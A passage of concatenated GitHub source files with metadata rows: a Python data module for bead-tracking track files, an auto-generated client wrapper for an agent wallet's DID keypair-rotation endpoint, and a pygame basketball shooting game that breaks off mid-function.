        return False
    # narrowed from a bare except so KeyboardInterrupt still propagates
    except Exception:
        return True
| passcombo/walnavi | mylibs/mailbox.py | mailbox.py | py | 19,504 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "socket.setdefaulttimeout",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "mylibs.ioprocessing.print_addr_book",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "mylibs.ioprocessing",
"line_number": 64,
"usage_type": "name"
},
{
"... |
28567141205 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Base track file data.
"""
from typing import (
Type, Optional, Union, Dict, Tuple, Any, List,
Sequence, Iterable, Iterator, cast, overload
)
from datetime import datetime
from pathlib import Path
from copy import deepcopy, copy
from enum import Enum
import numpy as np
from taskmodel import levelprop, Level, InstrumentType
from taskmodel.level import PHASE
from utils import initdefaults, NoArgs
from .views import Beads, Cycles, isellipsis, TrackView
from .trackio import opentrack, PATHTYPES, instrumentinfo
from .beadstats import (
RawPrecisionCache as _RawPrecisionCache,
beadextension as _beadextension,
phaseposition as _phaseposition,
)
IDTYPE = Union[None, int, range] # missing Ellipsys as mypy won't accept it
PIDTYPE = Union[IDTYPE, slice, Sequence[int]]
DATA = Dict[int, np.ndarray]
BEADS = Dict[int, 'Bead']
DIMENSIONS = Tuple[Tuple[float, float], Tuple[float, float]]
def _doc(tpe: type) -> str:
if tpe.__doc__:
doc = cast(str, tpe.__doc__).strip()
return doc[0].lower()+doc[1:].replace('\n', '\n ')+"\n"
return ''
def _lazies():
    "names of the lazily-loaded attributes reset by Track.unload"
    fixed = ['_data', '_rawprecisions']
    return tuple(fixed + list(LazyProperty.LIST))
class Axis(Enum):
    "which axis to look at"
    Xaxis = 'Xaxis'
    Yaxis = 'Yaxis'
    Zaxis = 'Zaxis'
    @classmethod
    def _missing_(cls, name):
        # accept shorthand spellings: 'x' -> 'X' -> 'Xaxis', etc.
        short = name.upper() if name in 'xyz' else name
        if short in 'XYZ':
            short += 'axis'
        return cls(short)
class Bead:
    """
    Characteristics of a bead:
    * `position` is the bead's (X, Y, Z) position
    * `image` is the bead's calibration image
    """
    # (X, Y, Z) coordinates -- presumably in nm, see FoV.dim; TODO confirm
    position: Tuple[float, float, float] = (0., 0., 0.)
    # calibration image pixels
    image: np.ndarray = np.zeros(0, dtype = np.uint8)
    @initdefaults(locals())
    def __init__(self, **_):
        pass
    def thumbnail(self, size, fov):
        "extracts a thumbnail around the bead position"
        # convert the (X, Y) position to pixel coordinates in the fov image
        pos = fov.topixel(np.array(list(self.position[:2])))
        # top-left corner of a size x size window centred on the bead
        ind = np.int32(np.round(pos))-size//2 # type: ignore
        return fov.image[ind[1]:ind[1]+size,ind[0]:ind[0]+size]
class FoV:
    """
    The data concerning the field of view:
    * `image` is one image of the field of view
    * `dim` are conversion factors from pixel to nm in the format:
    "(X slope, X bias), (Y slope, Y bias)".
    * `beads` is a dictionnary of information per bead:
    """
    if __doc__:
        # append the last bullet points of Bead's docstring to this one
        __doc__ += ''.join(f'    {i}\n' for i in cast(str, Bead.__doc__).split('\n')[-4:])
    image = np.empty((0,0), dtype = np.uint8)
    beads: BEADS = {}
    dim: DIMENSIONS = ((1., 0.), (1., 0.))
    @initdefaults(locals())
    def __init__(self, **kwa):
        pass
    def bounds(self, pixel = False):
        "image bounds in nm (*pixel == False*) or pixels"
        rng = self.image.shape[1], self.image.shape[0]
        return (0, 0) + rng if pixel else self.tonm((0,0)) + self.tonm(rng)
    def size(self, pixel = False):
        "image size in nm (*pixel == False*) or pixels"
        if self.image is None:
            # no image: estimate the extent from the bead positions instead
            xpos = [i.position[0] for i in self.beads.values()]
            ypos = [i.position[1] for i in self.beads.values()]
            if len(xpos) and len(ypos):
                return (max(1., np.nanmax(ypos)-np.nanmin(ypos)),
                        max(1., np.nanmax(xpos)-np.nanmin(xpos)))
            return 1., 1.
        rng = self.image.shape[1], self.image.shape[0]
        return rng if pixel else self.tonm(rng)
    def tonm(self, arr):
        "converts pixels to nm"
        return self.__convert(arr, self.dim)
    def topixel(self, arr):
        "converts nm to pixels"
        # inverse of the affine pixel->nm transform in self.dim
        return self.__convert(arr, tuple((1./i, -j/i) for i, j in self.dim))
    @property
    def scale(self):
        "The pixel scale: error occurs if the pixel is not square"
        if abs(self.dim[0][0]-self.dim[1][0]) > 1e-6:
            raise ValueError("Pixel is not square")
        return self.dim[0][0]
    @staticmethod
    def __convert(arr, dim):
        # apply the affine transform (slope, bias) per axis; preserves the
        # container type of *arr* (ndarray, 2-tuple, iterator or sequence)
        if len(arr) == 0:
            return arr
        (sl1, int1), (sl2, int2) = dim
        if isinstance(arr, np.ndarray):
            return [sl1, sl2] * arr + [int1, int2]
        if isinstance(arr, tuple) and len(arr) == 2 and np.isscalar(arr[0]):
            return tuple(i*k+j for (i, j), k in zip(dim, arr))
        tpe = iter if hasattr(arr, '__next__') else type(arr)
        return tpe([(sl1*i+int1, sl2*j+int2) for i, j in arr]) # type: ignore
class Secondaries:
    """
    Consists in arrays of sparse measures:
    * `track.secondaries.tservo` is the servo temperature
    * `track.secondaries.tsample` is the sample temperature
    * `track.secondaries.tsink` is the heat sink temperature
    * `track.secondaries.vcap` is a measure of magnet altitude using voltages
    * `track.secondaries.zmag` is a measure of magnet altitude provided by its motor
    * `track.secondaries.seconds` is the time axis
    """
    def __init__(self, track):
        self.__track = track
    data = property(lambda self: self.__track._secondaries,
                    doc = "returns all the data")
    tservo = cast(np.ndarray, property(lambda self: self.__value("Tservo"),
                                       doc = "the servo temperature"))
    tsample = cast(np.ndarray, property(lambda self: self.__value("Tsample"),
                                        doc = "the sample temperature"))
    tsink = cast(np.ndarray, property(lambda self: self.__value("Tsink"),
                                      doc = "the sink temperature"))
    vcap = cast(np.ndarray, property(lambda self: self.data.get("vcap"),
                                     doc = "the magnet position: vcap"))
    frames = cast(np.ndarray, property(lambda self: self.__track._secondaries["t"],
                                       doc = "the time axis (frame count)"))
    seconds = cast(
        np.ndarray,
        property(
            lambda self: (self.__track._secondaries["t"] / self.__track.framerate),
            doc = "the time axis (s)"
        )
    )
    zmag = cast(np.ndarray, property(lambda self: self.__track._secondaries["zmag"],
                                     doc = "the magnet altitude sampled at frame rate"))
    @property
    def cid(self) -> np.ndarray:
        "return the cycle per frame"
        # fill each cycle's frame span with the cycle index
        arr = np.zeros(self.__track.nframes, dtype = 'i4')
        for i, j in enumerate(np.split(
                arr,
                self.__track.phases[:,0]-self.__track.phases[0,0]
        )[1:]):
            j[:] = i
        return arr
    @property
    def cycleframe(self) -> np.ndarray:
        "return the frame-number per cycle, with each cycle starting at 0"
        arr = np.zeros(self.__track.nframes, dtype='i4')
        for j in np.split(
                arr,
                self.__track.phases[:, 0]-self.__track.phases[0, 0]
        )[1:]:
            j[:] = np.arange(len(j))
        return arr
    @property
    def cidcycles(self) -> Cycles:
        "return the phases per frame in cycles"
        return self.__track.cycles.withdata({"cid": self.cid})
    @property
    def phase(self) -> np.ndarray:
        "return the phases per frame"
        # splitting on every phase boundary; index modulo nphases gives the phase
        arr = np.zeros(self.__track.nframes, dtype = 'i1')
        nph = self.__track.nphases
        for i, j in enumerate(np.split(
                arr,
                self.__track.phases.ravel()-self.__track.phases[0,0]
        )[1:]):
            j[:] = i % nph
        return arr
    @property
    def phasecycles(self) -> Cycles:
        "return the phases per frame in cycles"
        return self.__track.cycles.withdata({"phase": self.phase})
    @property
    def zmagcycles(self) -> Cycles:
        "the magnet altitude sampled at frame rate"
        return self.__track.cycles.withdata({"zmag": self.zmag})
    @property
    def cycles(self) -> Cycles:
        "return zmag, phase and cid per cycle"
        return self.__track.cycles.withdata({
            i: getattr(self, i) for i in ('cid', 'zmag', 'phase')
        })
    def keys(self):
        "return the available secondaries"
        return set(self.data.keys()) | {"tservo", "tsample", "tsink", "vcap", "seconds", "zmag"}
    def __getitem__(self, name):
        "returns a secondary value"
        if hasattr(self, name):
            return getattr(self, name)
        # temperature channels are stored with a leading capital T
        return self.__value(name) if name.startswith("T") else self.data[name]
    def __value(self, name):
        # extract a sparse channel, shifting indexes to be 0-based and
        # discarding samples outside the track's frame range
        val = getattr(self.__track, '_secondaries')
        if val is None or name not in val:
            return None
        arr = np.copy(val[name])
        arr['index'] -= self.__track.phases[0,0]
        arr = arr[arr['index'] >= 0]
        arr = arr[arr['index'] < self.__track.nframes]
        return arr
class LazyProperty:
    "Checks whether the file was opened prior to returning a value"
    # records the underlying attribute names ('_xxx') of every instance;
    # Track.unload uses this list to reset them all
    LIST: List[str] = []
    def __init__(self, name: str = '', tpe: type = None) -> None:
        self._name = ''
        self._type = tpe
        if tpe and getattr(tpe, '__doc__', None):
            self.__doc__ = tpe.__doc__
        if name:
            self._name = '_'+name
            self.LIST.append(self._name)
    def __set_name__(self, _, name):
        # re-run __init__ now that the attribute name is known
        self.__init__(name, self._type)
    @staticmethod
    def _load(inst):
        inst.load()
    def __get__(self, inst: 'Track', owner):
        # trigger the lazy file load before exposing the value
        if inst is not None:
            self._load(inst)
        # when a wrapper type was provided, return an instance of it
        return (self._type(inst) if self._type and inst else
                getattr(owner if inst is None else inst, self._name))
    def __set__(self, obj: 'Track', val):
        self._load(obj)
        setattr(obj, self._name, val)
        return getattr(obj, self._name)
class InstrumentProperty(LazyProperty):
    "Checks whether the file was opened prior to returning a value"
    # overrides the parent staticmethod as an instance method: reads only
    # the instrument info from the file instead of loading everything
    def _load(self, inst):
        if not inst.isloaded:
            info = instrumentinfo(inst)
            info['type'] = InstrumentType(info['type'])
            setattr(inst, self._name, info)
class ResettingProperty:
    "Resets all if this attribute is changed"
    def __init__(self):
        self._name = ''
    def __set_name__(self, _, name):
        # store the value on the instance under a leading-underscore name
        self._name = '_' + name
    def __get__(self, obj: 'Track', _):
        # NB: truthiness test on obj, matching the original behaviour
        if not obj:
            return self
        return getattr(obj, self._name)
    def __set__(self, obj: 'Track', val):
        setattr(obj, self._name, val)
        # any change invalidates the loaded data
        obj.unload()
        return getattr(obj, self._name)
class ViewDescriptor:
    "Access to views"
    tpe: Optional[type] = None
    args: Dict[str, Any] = dict()
    def __get__(self, instance, owner):
        # on an instance, delegate to Track.view with the configured type
        return self if instance is None else instance.view(self.tpe, **self.args)
    def __set_name__(self, _, name):
        # the attribute name decides the view type: 'cycles*' -> Cycles, else Beads
        self.tpe = Cycles if name.startswith('cycles') else Beads
        self.args = dict(copy = False)
        setattr(self, '__doc__', getattr(self.tpe, '__doc__', None))
class PhaseManipulator:
    """
    Helper class for manipulating phases.
    """
    def __init__(self, track):
        self._track = track
    def __getitem__(self, value):
        # translate a phase name (or index) through the PHASE mapping
        return PHASE[value]
    def cut(self, cid:PIDTYPE = None) -> Tuple[np.ndarray, np.ndarray]:
        """
        Returns a selection of phases, *reindexed* to zero, with a list of
        frame ids corresponding to these phases.
        This can be used to create a track containing a fraction of the original data.
        """
        trk = self._track
        if isellipsis(cid):
            cycs = slice(None, None)
        # NOTE(review): the next branch is `if`, not `elif` -- when cid is
        # Ellipsis/None it falls into the `else` and overwrites cycs; confirm
        # whether `elif` was intended before changing behaviour.
        if isinstance(cid, (slice, range)):
            cycs = slice(0 if cid.start is None else cid.start,
                         len(trk.phases) if cid.stop is None else cid.stop,
                         1 if cid.step is None else cid.step)
        else:
            cycs = np.array(cid, dtype = 'i4')
        phases = trk.phases[cycs]
        first = phases[:,0]
        if isinstance(cycs, slice):
            last = trk.phases[cycs.start+1:cycs.stop+1:cycs.step,0] # type: ignore
        else:
            tmp = cycs+1
            last = trk.phases[tmp[tmp < len(trk.phases)],0]
            if len(last) < len(first):
                # last selected cycle runs to the end of the track
                last = np.append(last, trk.nframes+trk.phases[0,0])
        # frame indexes covered by the selected cycles, rebased to zero
        inds = np.concatenate([np.arange(j, dtype = 'i4')+i for i, j in zip(first, last-first)])
        inds -= self._track.phases[0, 0]
        # rebuild a phases table consistent with the re-indexed frames
        phases = (np.insert(np.cumsum(np.diff(np.hstack([phases, last[:,None]]))), 0, 0)
                  [:-1].reshape((-1, phases.shape[1])))
        return inds, phases
    def duration(self, cid:PIDTYPE = None, pid:IDTYPE = None) -> Union[np.ndarray, int]:
        """
        Returns the duration of a phase per cycle.
        """
        if isinstance(pid, (tuple, list, np.ndarray)):
            return np.vstack([self.__duration(cid, i) for i in cast(list, pid)]).T
        return self.__duration(cid, pid)
    def select(self, cid:PIDTYPE = None, pid:PIDTYPE = None) -> Union[np.ndarray, int]:
        """
        Returns the start time of the cycle and phase.
        If pid >= nphases, the end time of cycles is returned.
        if pid is a sequence of ints, a table is returned.
        """
        if isinstance(pid, (tuple, list, np.ndarray)):
            return np.vstack([self.__select(cid, i) for i in cast(list, pid)]).T
        return self.__select(cid, pid)
    nframes = cast(int, property(lambda self: self._track.nframes))
    ncycles = cast(int, property(lambda self: self._track.ncycles))
    nphases = cast(int, property(lambda self: self._track.nphases))
    if __doc__:
        # append the method summaries to the class docstring
        __doc__ += " * `cut`: " + cast(str, cut.__doc__) .strip()+"\n"
        __doc__ += " * `duration`: " + cast(str, duration.__doc__).strip()+"\n"
        __doc__ += " * `select`: " + cast(str, select.__doc__) .strip()+"\n"
    def __duration(self, cid:PIDTYPE = None, pid:IDTYPE = None) -> Union[np.ndarray, int]:
        # normalise pid to a range of phase indexes, then subtract start times
        phases = self._track.phases
        if isinstance(pid, str):
            pid = self[pid]
        if isinstance(pid, int):
            pid = range(pid, cast(int, None if pid == -1 else pid+1))
        elif isellipsis(pid):
            pid = range(phases.shape[1])
        elif isinstance(pid, (slice, range)):
            pid = range(
                None if pid.start is None else self[pid.start],
                None if pid.stop is None else self[pid.stop]
            )
        else:
            raise TypeError()
        start = 0 if pid.start is None else pid.start
        if pid.stop == start:
            # empty phase range: zero duration for each selected cycle
            return np.zeros(len(phases), dtype = 'i4')[cid]
        return self.select(cid, pid.stop) - self.select(cid, pid.start)
    def __select(self, cid:PIDTYPE = None, pid:PIDTYPE = None) -> Union[np.ndarray, int]:
        phases = self._track.phases
        ells = isellipsis(cid), isellipsis(pid)
        if not ells[1]:
            pid = self[pid]
        if np.isscalar(pid) and pid >= self._track.nphases:
            # pid past the last phase: return cycle *end* times instead
            if np.isscalar(cid):
                return (self._track.nframes if cid >= self._track.ncycles-1 else
                        phases[1+cast(int, cid),0]-phases[0,0])
            tmp = np.append(phases[1:,0]-phases[0,0], np.int32(self._track.nframes))
            return tmp[None if ells[0] else cid]
        # start times, rebased so frame 0 is the first frame of the track
        return (phases if all(ells) else
                phases[:,pid] if ells[0] else
                phases[cid,:] if ells[1] else
                phases[cid,pid]) - phases[0,0]
class PathInfo:
    """
    Provides information on the path itself:
    * `paths`: a tuple of paths
    * `trackpath`: the main path, i.e. not the grs
    * `size` (*megabytes*) is the size in bytes (megabytes) of *trackpath*
    * `stat`: stats on the *trackpath*
    * `modification`: the date of last modification. This is basically the
    time of experiment.
    * `creation`: the creation date. **DISCARD** when using PicoTwist tracks.
    """
    track: 'Track'
    def __get__(self, inst, tpe):
        # descriptor protocol: return a copy bound to the accessing Track
        if inst is None:
            return self
        cpy = PathInfo()
        cpy.track = inst
        return cpy
    @property
    def paths(self) -> List[Path]:
        "returns all paths"
        path = self.track.path
        return (
            [Path(path)] if isinstance(path, str) else
            [path] if isinstance(path, Path) else
            [] if path is None else
            [Path(str(i)) for i in cast(Iterable, path)]
        )
    @property
    def trackpath(self) -> Path:
        "returns the main (first) path"
        path = self.track.path
        return Path(str(path[0])) if isinstance(path, (list, tuple)) else Path(str(path))
    pathcount = property(lambda self: len(self.paths))
    stat = property(lambda self: self.trackpath.stat())
    size = property(lambda self: self.stat.st_size)
    megabytes = property(lambda self: self.size >> 20)
    creation = property(lambda self: datetime.fromtimestamp(self.stat.st_ctime))
    @property
    def modification(self):
        "return the modification date of the **original** track file."
        date = getattr(self.track, '_modificationdate', None)
        # NOTE(review): when _modificationdate IS set, the condition below is
        # False and date is reset to 0 -- the stored value is never returned;
        # confirm whether `date is None` should gate only the stat() fallback.
        if date is None and self.trackpath.exists():
            date = self.stat.st_mtime
        else:
            date = 0
        return datetime.fromtimestamp(date)
@levelprop(Level.project)
class Track:
    """
    The data from a track file, accessed lazily (only upon request).
    The data can be read as:
    ```python
    >>> raw = Track(path = "/path/to/a/file.trk")
    >>> grs = Track(path = ("/path/to/a/file.trk",
    ...                     "/path/to/a/gr/directory",
    ...                     "/path/to/a/specific/gr"))
    ```
    The data can then be accessed as follows:
    * for the *time* axis: `raw.beads['t']`
    * for the magnet altitude: `raw.beads['zmag']`
    * specific beads: `raw.beads[0]` where 0 can be any bead number
    * specific cycles: `raw.cycles[1,5]` where 1 and 5 can be any bead or cycle number.
    Some slicing is possible:
    * `raw.cycles[:,range(5,10)]` accesses cycles 5 though 10 for all beads.
    * `raw.cycles[[2,5],...]` accesses all cycles for beads 5 and 5.
    Only data for the Z axis is available. Use the `axis = 'X'` or `axis = 'Y'`
    options in the constructor to access other data.
    Other attributes are:
    * `framerate` is this experiment's frame rate
    * `phases` is a 2D array with one row per cycle and one column per phase
    containing the first index value of each cycle and phase.
    * `path` is the path(s) to the data
    * `axis` (Є {{'X', 'Y', 'Z'}}) is the data axis
    * `ncycles` is the number of cycles
    * `nphases` is the number of phases
    * `secondaries` {secondaries}
    * `fov` {fov}
    * `pathinfo` {pathinfo}
    """
    if __doc__:
        # splice the helper classes' docstrings into the placeholders above
        __doc__ = __doc__.format(
            secondaries = _doc(Secondaries),
            fov = _doc(FoV),
            pathinfo = _doc(PathInfo)
        )
    key: Optional[str] = None
    # lazy attributes: accessing them triggers a file load (LazyProperty);
    # assigning path/axis discards the loaded data (ResettingProperty)
    instrument = cast(Dict[str, Any], InstrumentProperty())
    phases = cast(np.ndarray, LazyProperty())
    framerate = cast(float, LazyProperty())
    fov = cast(FoV, LazyProperty())
    secondaries = cast(Secondaries, LazyProperty(tpe = Secondaries))
    path = cast(Optional[PATHTYPES], ResettingProperty())
    axis = cast(Axis, ResettingProperty())
    data = cast(
        DATA,
        property(lambda self: self.getdata(), lambda self, val: self.setdata(val))
    )
    @initdefaults('key',
                  **{i: '_' for i in locals() if i != 'key' and i[0] != '_'})
    def __init__(self, **kwa):
        # 'rawprecisions' may be a ready-made cache or just a computer spec
        self._rawprecisions: _RawPrecisionCache = _RawPrecisionCache()
        if 'rawprecisions' in kwa and isinstance(kwa['rawprecisions'], _RawPrecisionCache):
            self._rawprecisions = kwa['rawprecisions']
        elif 'rawprecisions' in kwa:
            self._rawprecisions.computer = kwa['rawprecisions']
    ncycles = cast(int, property(lambda self: len(self.phases)))
    nphases = cast(int, property(lambda self: self.phases.shape[1]))
    beads = cast(Beads, ViewDescriptor())
    cycles = cast(Cycles, ViewDescriptor())
    phase = property(PhaseManipulator, doc = PhaseManipulator.__doc__)
    pathinfo = PathInfo()
    def getdata(self) -> DATA:
        "returns the dataframe with all bead info"
        self.load()
        return cast(DATA, self._data)
    def setdata(self, data: Optional[Dict[int, np.ndarray]]):
        "sets the dataframe"
        if data is None:
            self.unload()
        else:
            self._data = data
    @property
    def nframes(self) -> int:
        "returns the number of frames"
        return len(next(iter(self.data.values()), []))
    @property
    def isloaded(self) -> bool:
        "returns whether the data was already acccessed"
        return self._data is not None
    def load(self, cycles: Optional[slice] = None) -> 'Track':
        "Loads the data"
        # no-op when already loaded or when there is no path to load from
        if self._data is None and self._path is not None:
            opentrack(self, cycles)
        return self
    def unload(self):
        "Unloads the data"
        # reset every lazy attribute to a copy of its class-level default
        for name in _lazies():
            setattr(self, name, deepcopy(getattr(type(self), name)))
    def view(self, tpe:Union[Type[TrackView], str], **kwa):
        "Creates a view of the suggested type"
        viewtype = (tpe if isinstance(tpe, type) else
                    Cycles if tpe.lower() == 'cycles' else
                    Beads)
        kwa.setdefault('parents', (self.key,) if self.key else (self.path,))
        kwa.setdefault('track', self)
        return viewtype(**kwa)
    @overload # noqa: F811
    def rawprecision(
            self,
            ibead: int,
            phases: Union[None, Dict[int, float], Tuple[int, int]],
    ):
        "Obtain the raw precision for a given bead"
    @overload # noqa: F811
    def rawprecision(self, computertype: str) -> None:
        "Set the raw precision computer"
    @overload # noqa: F811
    def rawprecision(self) -> str:
        "Obtain the raw precision computer"
    @overload # noqa: F811
    def rawprecision(
            self,
            ibead: Optional[Iterable[int]],
            phases: Union[None, Dict[int, float], Tuple[int, int]],
    ) -> Iterator[Tuple[int,float]]:
        "Obtain the raw precision for a number of beads"
    def rawprecision(self, ibead = NoArgs, phases = None): # noqa: F811
        "Obtain the raw precision for a number of beads"
        # no argument -> getter; type/str -> setter; otherwise compute
        if ibead is NoArgs:
            return self._rawprecisions.computer
        if isinstance(ibead, (type, str)):
            self._rawprecisions.computer = ibead
            return None
        return self._rawprecisions.get(self, ibead, phases)
    if __doc__ is not None:
        setattr(rawprecision, '__doc__', getattr(_RawPrecisionCache.get, '__doc__', None))
    beadextension = _beadextension
    phaseposition = _phaseposition
    def shallowcopy(self):
        "make a shallow copy of the track: different containers but for the true data"
        cpy = self.__class__()
        cpy.__dict__.update({i: copy(j) for i, j in self.__dict__.items()})
        return cpy
    def __getstate__(self):
        # keep only attributes that differ from the class defaults, strip
        # the leading underscore, and convert a few to picklable forms
        keys = set(_lazies()+('_path', '_axis'))
        test = dict.fromkeys(keys, lambda i, j: j != getattr(type(self), i)) # type: ignore
        test.update(_phases = lambda _, i: len(i),
                    key = lambda _, i: i is not None)
        cnv = dict.fromkeys(keys | {'key'}, lambda i: i) # type: ignore
        cnv.update(_secondaries = lambda i: getattr(i, 'data', None),
                   _axis = lambda i: getattr(i, 'value', i)[0])
        info = self.__dict__.copy()
        if self._lazydata_:
            # data can be re-read from disk: don't pickle it
            for i in ('_data', '_secondaries', '_fov'):
                info.pop(i, None)
        for name in set(cnv) & set(info):
            val = info.pop(name)
            if test[name](name, val):
                info[name[1:] if name[0] == '_' else name] = cnv[name](val)
        return info
    def __setstate__(self, values):
        # rebuild FoV / InstrumentType objects from their serialised forms
        if isinstance(values.get('fov', None), dict):
            fov = values['fov']
            fov["beads"] = {i: Bead(**j) for i, j in fov.get('beads', {}).items()}
            values['fov'] = FoV(**fov)
        if isinstance(values.get('instrument', {}).get("type", None), str):
            values['instrument']['type'] = InstrumentType(values['instrument']['type'])
        self.__init__(**values)
        keys = frozenset(self.__getstate__().keys()) | frozenset(('data', 'secondaries'))
        self.__dict__.update({i: j for i, j in values.items() if i not in keys})
    @property
    def _lazydata_(self):
        """
        Used internally to discard the data from __getstate__, or not
        """
        return self.__dict__.get('_lazydata_', self.path is not None)
    @_lazydata_.setter
    def _lazydata_(self, val):
        if val is None:
            self.__dict__.pop('_lazydata_', None)
        else:
            self.__dict__['_lazydata_'] = val
    # class-level defaults backing the lazy/resetting properties above
    _framerate: float = 30.
    _fov: Optional[FoV] = None
    _instrument: Dict[str, Any] = {
        "type": InstrumentType.picotwist.name,
        "name": None
    }
    _phases: np.ndarray = np.empty((0,9), dtype = 'i4')
    _data: Optional[DATA] = None # type: ignore
    _secondaries: Optional[DATA] = None
    _rawprecisions: _RawPrecisionCache = _RawPrecisionCache()
    _path: Optional[PATHTYPES] = None
    _axis: Axis = Axis.Zaxis
| depixusgenome/trackanalysis | src/data/track.py | track.py | py | 26,097 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "typing.Union",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "typing.Sequence",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_num... |
22290768472 | from typing import Any, Dict, Optional
import httpx
from ...client import Client
from ...models.wallet_module_response import WalletModuleResponse
from ...types import UNSET, Response
def _get_kwargs(
    *,
    client: Client,
    did: str,
) -> Dict[str, Any]:
    """Assemble the httpx request kwargs for the rotate-keypair PATCH call."""
    query: Dict[str, Any] = {"did": did}
    # drop parameters that are unset or absent before sending
    query = {key: value for key, value in query.items()
             if value is not UNSET and value is not None}
    return {
        "method": "patch",
        "url": "{}/wallet/did/local/rotate-keypair".format(client.base_url),
        "headers": client.get_headers(),
        "cookies": client.get_cookies(),
        "timeout": client.get_timeout(),
        "params": query,
    }
def _parse_response(*, response: httpx.Response) -> Optional[WalletModuleResponse]:
    """Turn a 200 response into a WalletModuleResponse; anything else is None."""
    if response.status_code != 200:
        return None
    return WalletModuleResponse.from_dict(response.json())
def _build_response(*, response: httpx.Response) -> Response[WalletModuleResponse]:
    """Wrap the raw httpx response together with its parsed payload."""
    parsed = _parse_response(response=response)
    return Response(
        status_code=response.status_code,
        content=response.content,
        headers=response.headers,
        parsed=parsed,
    )
def sync_detailed(
    *,
    client: Client,
    did: str,
) -> Response[WalletModuleResponse]:
    """Rotate keypair for a DID not posted to the ledger

    Args:
        did (str):

    Returns:
        Response[WalletModuleResponse]
    """
    raw = httpx.request(
        verify=client.verify_ssl,
        **_get_kwargs(client=client, did=did),
    )
    return _build_response(response=raw)
def sync(
    *,
    client: Client,
    did: str,
) -> Optional[WalletModuleResponse]:
    """Rotate keypair for a DID not posted to the ledger

    Args:
        did (str):

    Returns:
        Response[WalletModuleResponse]
    """
    detailed = sync_detailed(client=client, did=did)
    return detailed.parsed
async def asyncio_detailed(
    *,
    client: Client,
    did: str,
) -> Response[WalletModuleResponse]:
    """Rotate keypair for a DID not posted to the ledger

    Args:
        did (str):

    Returns:
        Response[WalletModuleResponse]
    """
    request_kwargs = _get_kwargs(client=client, did=did)
    async with httpx.AsyncClient(verify=client.verify_ssl) as session:
        raw = await session.request(**request_kwargs)
    return _build_response(response=raw)
async def asyncio(
    *,
    client: Client,
    did: str,
) -> Optional[WalletModuleResponse]:
    """Rotate keypair for a DID not posted to the ledger

    Args:
        did (str):

    Returns:
        Response[WalletModuleResponse]
    """
    detailed = await asyncio_detailed(client=client, did=did)
    return detailed.parsed
| Indicio-tech/acapy-client | acapy_client/api/wallet/patch_wallet_did_local_rotate_keypair.py | patch_wallet_did_local_rotate_keypair.py | py | 2,921 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "client.Client",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "client.base_url",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "typing.Dict",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "client.get_headers",
... |
71795305634 | import pygame
from random import randint
pygame.init()

# game window
WIDTH = 600
HEIGHT = 400
win = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Shot Clock")
pygame.display.set_icon(pygame.image.load('icon.png'))

# game font
pygame.font.init()
GAME_FONT = pygame.font.Font('gamera.TTF', 35)

# game start and timing variables
game_start = False   # boolean that controls the main loop
start_time = 0       # start time for the game timer (pygame ticks, ms)
TIME_ALLOWED = 60    # amount of time the player has (seconds)

# ball properties (vertical speed bounds, pixels per frame)
MAX_BALL_SPEED = 17
MIN_BALL_SPEED = 4

# game colors (RGB)
BLACK = (0, 0, 0)
ORANGE = (252, 102, 0)
WHITE = (255, 255, 255)

# sprites
HOOP = pygame.image.load('hoop.png')
BASKETBALL = pygame.image.load('ball.png')
class Ball:
    """A basketball falling straight down at a fixed vertical speed."""

    def __init__(self, x, y, vel):
        self.x = x
        self.y = y
        self.vel = vel

    def draw_ball(self, surface):
        """Draw the basketball sprite at the ball's current spot."""
        surface.blit(BASKETBALL, (self.x, self.y))

    def update_position(self):
        """Move the ball down by one step of its velocity."""
        self.y = self.y + self.vel

    def is_off_screen(self):
        """Report whether the ball has dropped below the visible window."""
        off_bottom = self.y > 420
        return off_bottom
# game start loop
def start_game():
    """Show the start screen and block until the player presses SPACE.

    Sets the module-level game_start flag and records start_time (in pygame
    ticks) when the game begins.  A QUIT event or ESC exits the program.
    """
    global game_start
    global start_time
    line1 = GAME_FONT.render("Make Shots! You Have 60s!!", True, ORANGE)
    line2 = GAME_FONT.render("Press SPACE To Start!!", True, ORANGE)
    line3 = GAME_FONT.render("ESC to Exit R to Reset", True, ORANGE)
    line4 = GAME_FONT.render("A:Left D:Right", True, ORANGE)
    win.blit(line1, (50, 50))
    win.blit(line2, (80, 130))
    win.blit(line3, (80, 210))
    win.blit(line4, (150, 290))
    pygame.display.update()
    # BUG FIX: removed the redundant "if game_start: break" that sat at the
    # top of this loop -- the while condition already guarantees game_start
    # is False here, so that branch could never run.
    while not game_start:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                exit()
            elif event.type == pygame.KEYDOWN:
                if event.key == pygame.K_SPACE:
                    game_start = True
                    start_time = pygame.time.get_ticks()
                if event.key == pygame.K_ESCAPE:
                    pygame.quit()
                    exit()
def is_time_left():
    """Return True while the elapsed whole seconds are under TIME_ALLOWED."""
    elapsed_seconds = int((pygame.time.get_ticks() - start_time) / 1000)
    return elapsed_seconds < TIME_ALLOWED
# the pool of four balls that is recycled for the whole game; each starts at
# the top with a random x position and speed
game_balls = [
    Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED)),
    Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED)),
    Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED)),
    Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED))
]
def new_ball(index):
    """Respawn ball *index* at the top with a fresh random x and speed.

    Each respawn also ratchets MIN_BALL_SPEED up by one (until it reaches
    MAX_BALL_SPEED), so the game gets gradually harder.
    """
    global MAX_BALL_SPEED
    global MIN_BALL_SPEED
    ball = game_balls[index]
    ball.x = randint(30, 570)
    ball.y = 0
    ball.vel = randint(MIN_BALL_SPEED, MAX_BALL_SPEED)
    if MIN_BALL_SPEED < MAX_BALL_SPEED:
        MIN_BALL_SPEED += 1
def main():
    """Run one full game: start screen, 60-second play loop, end screen."""
    global game_start
    global start_time
    # hoop sprite position and its simplified catch hitbox
